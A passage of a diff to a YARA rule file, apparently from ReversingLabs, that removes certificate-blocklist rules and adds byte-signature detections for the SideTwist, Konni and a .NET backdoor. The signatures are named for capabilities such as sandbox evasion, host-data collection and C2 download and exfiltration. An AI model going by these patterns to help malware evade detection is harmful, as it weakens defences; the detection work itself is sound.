+        ?? ?? 0B 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 07 A2 11 ?? 17 7E ?? ?? ?? ?? A2 11 ?? 18
+        72 ?? ?? ?? ?? A2 11 ?? 19 7E ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ??
+        ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B
+        07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 12 ?? 28 ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? DE ?? 26 16 80 ?? ?? ?? ?? DE ??
+        DE ?? 11 ?? 28 ?? ?? ?? ?? DC 7E
+    }
+		$receive_v2 = {
+        72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 15 6A 0A 16 0B 07 17 D6
+        0B 07 1F ?? 33 ?? 16 0B 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 17 3C ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 15 16 6F ?? ?? ??
+        ?? 26 38 ?? ?? ?? ?? 06 15 6A 3B ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 D6 8D
+        ?? ?? ?? ?? 80 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DA 0C 7E ?? ?? ?? ?? 8E
+        69 6A 08 31 ?? 08 17 6A DA B7 17 D6 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 7E ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 16 6F ?? ?? ?? ?? 0D 7E ?? ?? ??
+        ?? 7E ?? ?? ?? ?? 16 09 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 40 ?? ?? ??
+        ?? 15 6A 0A 7E ?? ?? ?? ?? 2D ?? 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
+        ?? ?? 7E ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 11 ?? 1F ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ??
+        ?? 80 ?? ?? ?? ?? 38 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
+        6F ?? ?? ?? ?? 13 ?? 11 ?? 15 2E ?? 11 ?? 2C ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 12
+        ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 28
+        ?? ?? ?? ?? 0A 06 16 6A 33 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 15 6A 0A 7E ?? ?? ??
+        ?? 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? DE
+        ?? 26 DE ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ??
+        14 14 14 17 28 ?? ?? ?? ?? 26 14 80 ?? ?? ?? ?? DE ?? 26 DE ?? 16 80 ?? ?? ?? ?? 28
+        ?? ?? ?? ?? 2C ?? 17 80
+    }
+		$get_system_information_v2_p1 = {
+        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 0B 7F ?? ?? ?? ?? 28 ?? ?? ?? ??
+        72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 07 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 0D 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+        ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+        ?? 09 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 13 ?? 28 ??
+        ?? ?? ?? 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06
+        28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ??
+        ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE
+        ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 06 7E ?? ?? ?? ?? 6F
+        ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E
+        ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
+        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 28
+        ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 72 ?? ?? ?? ?? 28 ?? ?? ??
+        ?? 0A DE ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ??
+        ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 33 ?? 06 72 ?? ?? ?? ?? 28 ?? ??
+        ?? ?? 0A 06 11 ?? 11 ?? 8E 69 17 DA 9A 28 ?? ?? ?? ?? 0A DE ?? 26 06 72
+    }
+		$get_system_information_v2_p2 = {
+        28 ?? ?? ?? ?? 0A DE ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06
+        72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 28 ?? ?? ?? ?? 0A DE ?? 26 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A DE ?? 28 ?? ?? ??
+        ?? 2C ?? 06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 2B ?? 06 72 ?? ?? ?? ??
+        7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
+        06 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 7E ?? ?? ?? ??
+        28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ??
+        28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A
+        13 ?? 11 ?? 6F ?? ?? ?? ?? 1F ?? 33 ?? 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13
+        ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 06 11 ?? 28
+    }
+		$send_v2 = {
+        7E ?? ?? ?? ?? 2D ?? 16 2A 7E ?? ?? ?? ?? 0A 06 25 13 ?? 28 ?? ?? ?? ?? 7E ?? ?? ??
+        ?? 2D ?? 16 13 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 02 8E 69 13 ?? 12 ?? 28 ?? ?? ??
+        ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 12 ?? 28 ?? ?? ?? ?? 0D 07 09 16 09 8E 69 6F ??
+        ?? ?? ?? 07 02 16 02 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
+        ?? ?? 16 07 6F ?? ?? ?? ?? B7 16 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 11 ?? 28
+        ?? ?? ?? ?? DC DE ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 16 80 ?? ?? ??
+        ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 28 ?? ?? ?? ?? DE ?? 7E ?? ?? ?? ??
+        2A 11
+    }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ohanae" and pe.signatures [ i ] . serial == "32:66:50:79:c5:a5:85:4a:68:33:62:3c:a7:7f:f5:ac" and 1381967999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $persistence_mechanism_v1_p* ) ) and ( all of ( $connect_v1_p* ) ) and ( $send_v1 ) and ( all of ( $receive_v1_p* ) ) ) or ( ( $connect_v2 ) and ( $receive_v2 ) and ( all of ( $get_system_information_v2_p* ) ) and ( $send_v2 ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_01A90094C83412C00Cf98Dd2Eb0D7042 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Sidetwist : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects SideTwist backdoor."
 		author = "ReversingLabs"
-		id = "e5059974-9ea2-5497-a728-c21a6cdd30e4"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "979b442e-8739-54a8-b486-39fc5673791e"
+		date = "2024-03-18"
+		modified = "2024-03-18"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L405-L421"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5a3de0e6de5cda39e40988f9e2324cbee3e059aff5ceaf7fd819de8bf7215808"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win64.Backdoor.SideTwist.yara#L1-L154"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "811fa73ede59493c71435743848a3fce3a1604ec4065ffcb0b43e9715dfa5c31"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "SideTwist"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$anti_sandbox_detect_environment = {
+            55 57 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 89 4D ?? 48 89 55 ?? E8 ??
+            ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 55 ?? 48 8D 45 ?? 4C
+            8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 75 ?? 48 8B 45 ?? 48 85
+            C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C1 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8D 4D ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ??
+            ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
+            D0 85 C0 0F 94 C0 84 C0 74 ?? 48 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
+            D0 BB ?? ?? ?? ?? BE ?? ?? ?? ?? EB
+        }
+		$collect_host_information = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? C7 45 ??
+            ?? ?? ?? ?? 8B 45 ?? 89 C0 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 39 C2 72 ?? 48 01 C0 48
+            89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48
+            8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 89 C2 B9 ??
+            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 4D ?? 48 8B 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            89 C2 48 8D 4D ?? 48 8D 45 ?? 49 89 C9 49 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
+            48 8D 55 ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ??
+            48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ??
+            48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 15 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89
+            C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D
+            45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$contact_c2_server = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ??
+            ?? ?? 48 8B 55 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 8D 45
+            ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 4D ?? 48 89 4C 24 ?? 4D 89
+            C1 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
+            ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 55 ??
+            48 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 D8
+            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
+            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
+            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89
+            C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$parse_c2_response = {
+            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 55 ?? 48 8D 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 55 ?? 48
+            8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B
+            55 ?? 48 01 C2 48 8B 45 ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89
+            D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48
+            89 C1 E8 ?? ?? ?? ?? 90 48 83 C4 ?? 5B 5D C3
+        }
+		$download_file_from_c2_p1 = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
+            ?? 4C 89 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 5D ?? 48 8B 55 ??
+            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
+            ?? 49 89 D0 48 89 C2 48 89 D9 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 88 45 ?? 48 8D 85 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 0F B6 45 ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 85
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 89 C2 48 8D 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
+            D0 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 C0 74 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
+            8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 49 89 D9 49 89 D0 BA ?? ?? ?? ?? 48 89
+            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48
+        }
+		$download_file_from_c2_p2 = {
+            89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 8B 55 ?? 49
+            89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05
+            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 4D ?? 48 8D 55 ?? 49 89 C8 48
+            89 C1 E8 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
+            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3
+            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8B
+            45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$reply_to_c2_server = {
+            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
+            ?? 4C 89 4D ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 8B 55 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8B 55 ?? 49 89
+            D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ??
+            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 55 ?? 49 89
+            C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
+            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
+            ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1
+            E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48
+            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81
+            C4 ?? ?? ?? ?? 5B 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FreeVox SA" and pe.signatures [ i ] . serial == "01:a9:00:94:c8:34:12:c0:0c:f9:8d:d2:eb:0d:70:42" and 1376956799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $anti_sandbox_detect_environment ) and ( $collect_host_information ) and ( $contact_c2_server ) and ( $parse_c2_response ) and ( all of ( $download_file_from_c2_p* ) ) and ( $reply_to_c2_server )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_55Efe24B9674855Baf16E67716479C71 : INFO FILE
+rule REVERSINGLABS_Win32_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Konni backdoor."
 		author = "ReversingLabs"
-		id = "c1a4102e-ce78-5a4d-95ea-b9e394df0c28"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6fe230b1-357a-54f7-a9a8-15d0369fec71"
+		date = "2023-12-07"
+		modified = "2023-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L423-L439"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2cf7a76ae3c3a698564013ff545c74d0319face5aa19416c93bf10f45f84f8c9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Win32.Backdoor.Konni.yara#L1-L190"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7907a657d804d485718ba13bb23513de0b909e7d455c2b3ee193b5329edd3ac6"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Konni"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S2BVISIO BELGIQUE SA" and pe.signatures [ i ] . serial == "55:ef:e2:4b:96:74:85:5b:af:16:e6:77:16:47:9c:71" and 1374451199 <= pe.signatures [ i ] . not_after )
-}
-
